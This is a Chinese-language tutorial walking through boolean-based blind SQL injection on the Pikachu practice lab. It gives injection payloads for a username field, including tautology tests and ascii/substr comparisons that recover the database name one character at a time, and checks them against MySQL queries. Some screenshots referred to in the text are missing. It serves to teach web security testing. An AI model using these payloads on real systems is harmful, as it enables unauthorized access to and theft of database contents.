基于boolean盲注的案例演示

一、
打开pikachu，点击盲注（base on boolian),输入一个单引号，点提交，这时候你会发现显示结果为“您输入的username不存在，请重新输入”。

二、输入“kobe’ or 1=1#",点查询，同样也会提示“您输入的username不存在，请重新输入”
三、进一步来判断
输入"kobe’ and 1=1#",这时候发现打印出了正确的输出，即

四、若输入"kobe’ and 1=2#",因为不成立，这时候出现以下文字
小结：通过这样的逻辑比对，我们就可以知道后端这个点是否存在注入的，因为它会把我们拼进去的and1=1,and 1=2进行运算的，但是貌似这个前端输出的信息特别少，它只有当你输入正确时有一个正确的结果以及你输入不正确时告诉你用户名不存在。
此时，我们先打开mysql,输入root（一般默认密码是root)，输入show databases;再接着输入use pikachu;

再输入：select database();获得当前数据库的名称

再接着输入：select substr(database(),1,1);进行取值，从第一个开始取，取第一个字符串。

这时候会把’p’取出来，我们可以对它进行进一步的处理，我们把p转化成ascii值，即select ascii(substr(database(),1,1));
说明p对应的ascii值为112，转成ascii的目的是为了对它进行运算，即


在前端输入"kobe’ and ascii(substr(database(),1,1))>113#",出现

若输入"kobe’ and ascii(substr(database(),1,1))=112#",

然后就把kobe的信息显示出来了！
需要猜多少次才能把字符串猜完，可以利用length,即

说明有7个字符。